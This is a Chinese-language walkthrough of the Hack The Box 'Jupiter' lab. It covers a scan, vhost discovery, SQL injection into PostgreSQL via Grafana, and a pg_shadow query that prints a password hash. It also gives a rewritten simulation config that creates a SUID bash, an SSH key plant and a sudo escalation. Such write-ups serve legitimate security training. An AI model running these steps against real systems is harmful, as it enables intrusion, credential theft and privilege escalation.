Nmap
┌──(root💀kali)-[/home/kali/hacktheboxtools]
└─# nmap -A 10.10.11.216
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 11:21 EDT
Stats: 0:00:57 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.94% done; ETC: 11:22 (0:00:00 remaining)
Stats: 0:00:58 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 11:22 (0:00:00 remaining)
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 11:22 (0:00:00 remaining)
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 11:22 (0:00:00 remaining)
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 11:22 (0:00:00 remaining)
Nmap scan report for 10.10.11.216
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 ac5bbe792dc97a00ed9ae62b2d0e9b32 (ECDSA)
|_ 256 6001d7db927b13f0ba20c6c900a71b41 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://jupiter.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=6/5%OT=22%CT=1%CU=30597%PV=Y%DS=2%DC=T%G=Y%TM=647DFDB9
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=109%TI=Z%CI=Z%TS=B)SEQ(SP=10
OS:1%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M537ST11NW7%O2=M537ST11NW7%O3
OS:=M537NNT11NW7%O4=M537ST11NW7%O5=M537ST11NW7%O6=M537ST11)WIN(W1=FE88%W2=F
OS:E88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M537NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 270.35 ms 10.10.16.1
2 176.97 ms 10.10.11.216
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.74 seconds
常见的两个端口22 和 80端口
image.png
添加 /etc/hosts
10.10.11.216 jupiter.htb
主域名
image.png
根域名没啥功能点,暂时看上去,vhost 碰撞看看
┌──(root💀kali)-[/home/kali/hacktheboxtools]
└─# gobuster vhost -u http://jupiter.htb --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://jupiter.htb
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
2023/06/05 11:25:42 Starting gobuster in VHOST enumeration mode
===============================================================
Found: kiosk.jupiter.htb Status: 200 [Size: 34390]
Progress: 114441 / 114442 (100.00%)===============================================================
2023/06/05 11:41:33 Finished
===============================================================
kiosk.jupiter.htb
有一个kiosk.jupiter.htb的域名,加入到hosts文件中
image.png
是一个grafana的应用
image.png
bp看到历史记录中有这么一个包
image.png
这里能控制sql语句
image.png
Refer:https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql
postgreSql
查看数据库
SELECT datname FROM pg_database;
image.png
| postgres |
|---|
| moon_namesdb |
| template1 |
| template0 |
Readcredentials
SELECT usename, passwd from pg_shadow;
image.png
| username | passwd |
|---|---|
| postgres | Null |
| grafana_viewer | SCRAM-SHA-256$4096:K9IJE4h9f9+tr7u7AZL76w==$qdrtC1sThWDZGwnPwNctrEbEwc8rFpLWYFVTeLOy3ss=:oD4gG69X8qrSG4bXtQ62M83OkjeFDOYrypE3tUv0JOY= |
RCE
image.png
image.png
image.png
尝试反弹shell
image.png
image.png
shell!!!! ^-^
信息收集
linpeas
上linpeas 收集一下信息
image.png
跟用户有关系的信息
pspy
image.png
一堆的反弹shell hhhh 同时打的人太多了
juno运行的进程
image.png
等着等着发现了uid=1000(juno)运行了一个脚本 shadow-simulation.sh (估计是用来模拟网络用的)而且估计是定时任务
然后紧接着 删除了 /dev/shm/shadow.data
然后通过shadow 命令 加上/dev/shm/network-simulation.yml作为参数
所以我们看看配置文件
image.png
network-simulation.yml
general:
# stop after 10 simulated seconds
stop_time: 10s
# old versions of cURL use a busy loop, so to avoid spinning in this busy
# loop indefinitely, we add a system call latency to advance the simulated
# time when running non-blocking system calls
model_unblocked_syscall_latency: true
network:
graph:
# use a built-in network graph containing
# a single vertex with a bandwidth of 1 Gbit
type: 1_gbit_switch
hosts:
# a host with the hostname 'server'
server:
network_node_id: 0
processes:
- path: /usr/bin/python3
args: -m http.server 80
start_time: 3s
# three hosts with hostnames 'client1', 'client2', and 'client3'
client:
network_node_id: 0
quantity: 3
processes:
- path: /usr/bin/curl
args: -s server
start_time: 5s
这个配置文件看起来就像是,服务端启动一个开在 80端口web服务,然后客户端去请求这个web服务
path 的参数的 位置感觉像是 执行的二进制文件的绝对路径
args 自然就是参数
尝试执行chmod +s /bin/bash 的命令 给bash带上suid
general:
# stop after 10 simulated seconds
stop_time: 10s
# old versions of cURL use a busy loop, so to avoid spinning in this busy
# loop indefinitely, we add a system call latency to advance the simulated
# time when running non-blocking system calls
model_unblocked_syscall_latency: true
network:
graph:
# use a built-in network graph containing
# a single vertex with a bandwidth of 1 Gbit
type: 1_gbit_switch
hosts:
# a host with the hostname 'server'
server:
network_node_id: 0
processes:
- path: /usr/bin/cp
args: /bin/bash /tmp/someb0dy/bash
start_time: 3s
# three hosts with hostnames 'client1', 'client2', and 'client3'
client:
network_node_id: 0
quantity: 3
processes:
- path: /usr/bin/chmod
args: u+s /tmp/someb0dy/bash
start_time: 5s
然后上传到靶机的/dev/shm/目录下,值得说一下的是,这个目录存储的内容其实是存储在内存当中的
我先把内容上传到/tmp/someb0dy目录下
然后再通过cp /tmp/someb0dy/network-simulation.yml /dev/shm/ 覆盖原本的network-simulation.yml
记得给/tmp/someb0dy附上 777的权限,不然juno用户没有权限写入到 这个文件夹
image.png
然后在/tmp/someb0dy下 运行./bash -p ,成功变成juno 权限
来到/home/juno查看那个脚本也可以确认
bash-5.1$ cat shadow-simulation.sh
cat shadow-simulation.sh
#!/bin/bash
cd /dev/shm
rm -rf /dev/shm/shadow.data
/home/juno/.local/bin/shadow /dev/shm/*.yml
cp -a /home/juno/shadow/examples/http-server/network-simulation.yml /dev/shm/
ssh 公钥写入
我们还可以直接写入公钥到.ssh/authorized_keys 里面就可以ssh登录了
ssh-key -f someb0dy 生成公私钥
cp /tmp/someb0dy/someb0dy.pub /home/juno/.ssh/authorized_keys
image.png
通过私钥成功登录,发现是science 组,搜索一下文件
image.png
frp代理流量
看着有许多端口的,搭建一个代理看看
image.png
这里为什么要搜token信息呢,因为8888端口开了一个jupyter的服务
image.png
上面用了都不对
然后直接看日志文件今天6.6,里面的可以用了
image.png
用日志里面的可以
image.png
image.png
image.png
一样和上一个用户一样的手法,同样写入.ssh/authorized_keys
image.png
提权
jovian@jupiter:/usr/local/bin$ sudo -l
Matching Defaults entries for jovian on jupiter:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User jovian may run the following commands on jupiter:
(ALL) NOPASSWD: /usr/local/bin/sattrack
可以以管理员执行权限执行这个**/usr/local/bin/sattrack**
image.png
我们直接运行这个东西,输出了一些提示信息
把bash换成这个二进制文件
image.png
总结
这个靶机总体来说难道中等,常规的收集信息手段,收集到子域名后,进一步收集信息,通过Postgresql 拿到Postgresql用户的shell,通过查看进程信息,来进一步获取juno的权限,接着通过juno所在的组,获取到jovian的权限,最后成功拿到root
